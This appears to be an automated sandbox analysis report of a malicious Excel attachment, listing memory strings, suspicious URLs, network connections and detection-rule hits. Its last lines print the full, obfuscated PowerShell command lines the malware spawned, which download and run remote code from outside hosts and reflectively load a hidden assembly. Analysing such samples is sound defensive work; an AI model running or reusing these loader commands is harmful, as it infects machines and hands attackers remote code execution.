        Source: mshta.exe, 00000004.00000003.435988921.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440480058.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.465465325.000000001C3C3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.465465325.000000001C360000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487428731.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.482734018.0000000003E02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
        Source: mshta.exe, 00000004.00000003.435988921.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440480058.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.465465325.000000001C3C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487428731.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.482734018.0000000003E02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
        Source: mshta.exe, 00000004.00000003.435988921.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440480058.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.465465325.000000001C3C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487428731.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.482734018.0000000003E02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
        Source: mshta.exe, 00000004.00000003.435988921.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440480058.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.465103812.000000001A91B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487428731.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.482734018.0000000003E02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: mshta.exe, 00000004.00000003.435988921.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440480058.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.465465325.000000001C3C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487428731.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.482734018.0000000003E02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
        Source: mshta.exe, 00000004.00000003.435988921.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440480058.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.465465325.000000001C3C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487428731.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.482734018.0000000003E02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
        Source: mshta.exe, 0000000F.00000003.487428731.0000000003E37000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.usertru
        Source: powershell.exe, 00000007.00000002.465465325.000000001C4A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.cr
        Source: powershell.exe, 00000007.00000002.458485050.0000000002A55000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.494624441.00000000025A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
        Source: powershell.exe, 00000007.00000002.464145713.0000000012561000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: mshta.exe, 00000004.00000003.435988921.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440480058.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.465465325.000000001C3C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487428731.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.482734018.0000000003E02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
        Source: mshta.exe, 00000004.00000003.435988921.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440480058.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.465465325.000000001C3C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487428731.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.482734018.0000000003E02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
        Source: mshta.exe, 00000004.00000003.435988921.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440480058.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.465465325.000000001C3C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487428731.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.482734018.0000000003E02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
        Source: mshta.exe, 00000004.00000003.435988921.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440480058.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.465465325.000000001C3C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487428731.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.482734018.0000000003E02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
        Source: mshta.exe, 00000004.00000003.435988921.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440480058.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.465465325.000000001C360000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487428731.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.482734018.0000000003E02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
        Source: mshta.exe, 00000004.00000003.435988921.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440480058.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.465465325.000000001C3C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487428731.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.482734018.0000000003E02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
        Source: mshta.exe, 00000004.00000003.435988921.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440480058.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.465465325.000000001C3C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487428731.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.482734018.0000000003E02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
        Source: powershell.exe, 00000007.00000002.458485050.0000000002531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.518019597.00000000022A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.494624441.00000000023BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.549469905.0000000002211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: mshta.exe, 00000004.00000003.435988921.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440480058.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.465465325.000000001C3C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487428731.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.482734018.0000000003E02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
        Source: mshta.exe, 00000004.00000003.435988921.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440480058.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.465465325.000000001C3C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487428731.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.482734018.0000000003E02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
        Source: powershell.exe, 00000007.00000002.464145713.0000000012561000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000007.00000002.464145713.0000000012561000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000007.00000002.464145713.0000000012561000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: mshta.exe, 00000004.00000003.435988921.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440480058.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488436254.0000000000331000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487377739.0000000000331000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487428731.0000000003E37000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jktc.pro/
        Source: mshta.exe, 0000000F.00000003.487428731.0000000003E37000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jktc.pro/1.a2M
        Source: mshta.exe, 00000004.00000003.437054940.00000000004B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440382828.00000000004B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.434479190.00000000004B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jktc.pro/5
        Source: mshta.exe, 0000000F.00000002.488436254.00000000002FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487377739.000000000031E000.00000004.00000020.00020000.00000000.sdmp, Euro confirmation Sp.xls, ~DF634BD35CC9B94982.TMP.0.drString found in binary or memory: https://jktc.pro/94W72u?&deficit=exultant&breath=willing&analyst=luxuriant&plot=ethereal&eggplant=gr
        Source: mshta.exe, 00000004.00000003.437054940.00000000004B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440382828.00000000004B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.434479190.00000000004B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jktc.pro/:
        Source: powershell.exe, 00000007.00000002.464145713.0000000012561000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: powershell.exe, 0000000D.00000002.518019597.00000000024A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.549469905.0000000002412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com
        Source: powershell.exe, 00000018.00000002.549469905.0000000002412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg
        Source: powershell.exe, 0000000D.00000002.518019597.00000000024A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.549469905.0000000002412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpgX
        Source: mshta.exe, 00000004.00000003.435988921.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440480058.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.465465325.000000001C3C3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.465465325.000000001C360000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487428731.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.482734018.0000000003E02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
        Source: unknownNetwork traffic detected: HTTP traffic on port 49161 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
        Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49161
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
        Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
        Source: unknownHTTPS traffic detected: 104.21.34.183:443 -> 192.168.2.22:49161 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.34.183:443 -> 192.168.2.22:49163 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.163.184:443 -> 192.168.2.22:49170 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.163.184:443 -> 192.168.2.22:49169 version: TLS 1.2
        Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

        System Summary

        barindex
        Source: Process Memory Space: powershell.exe PID: 2956, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: Process Memory Space: powershell.exe PID: 1732, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: Euro confirmation Sp.xlsOLE: Microsoft Excel 2007+
        Source: Euro confirmation Sp.xlsOLE: Microsoft Excel 2007+
        Source: Euro confirmation Sp.xlsOLE: Microsoft Excel 2007+
        Source: Euro confirmation Sp.xlsOLE: Microsoft Excel 2007+
        Source: ~DF634BD35CC9B94982.TMP.0.drOLE: Microsoft Excel 2007+
        Source: ~DF634BD35CC9B94982.TMP.0.drOLE: Microsoft Excel 2007+
        Source: ~DF634BD35CC9B94982.TMP.0.drOLE: Microsoft Excel 2007+
        Source: ~DF634BD35CC9B94982.TMP.0.drOLE: Microsoft Excel 2007+
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood[1].htaJump to behavior
        Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $verilus = 'JGFwb3N0b2xpY25lc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskdmlicm9tZXRlcnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRzYW5nYXBlbnVtID0gJHZpYnJvbWV0ZXJzLkRvd25sb2FkRGF0YSgkYXBvc3RvbGljbmVzcyk7JGhvcmlzbWFzY29wZSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRzYW5nYXBlbnVtKTskSmFuaW5lID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR0cmlicm9tc2Fsb2wgPSAnPDxCQVNFNjRfRU5EPj4nOyRBcmFicyA9ICRob3Jpc21hc2NvcGUuSW5kZXhPZigkSmFuaW5lKTskcGx1cmlzcGlyYWwgPSAkaG9yaXNtYXNjb3BlLkluZGV4T2YoJHRyaWJyb21zYWxvbCk7JEFyYWJzIC1nZSAwIC1hbmQgJHBsdXJpc3BpcmFsIC1ndCAkQXJhYnM7JEFyYWJzICs9ICRKYW5pbmUuTGVuZ3RoOyRkZWNlcm5tZW50ID0gJHBsdXJpc3BpcmFsIC0gJEFyYWJzOyRhZmlyZSA9ICRob3Jpc21hc2NvcGUuU3Vic3RyaW5nKCRBcmFicywgJGRlY2Vybm1lbnQpOyR1bmRyZXNzZWQgPSAtam9pbiAoJGFmaXJlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRhZmlyZS5MZW5ndGgpXTskR2FzdG9uID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5kcmVzc2VkKTskY3V0aXRlcmVicmEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRHYXN0b24pOyRhbGxhbnRvaWRlYSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRhbGxhbnRvaWRlYS5JbnZva2UoJG51bGwsIEAoJzAvdnlpZEIvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRiaW9ncmFwaGVlcycsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywgJ0Nhc1BvbCcsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnMScsJyRiaW9ncmFwaGVlcycpKTs=';$spinispicule = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($verilus));Invoke-Expression $spinispicule
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"
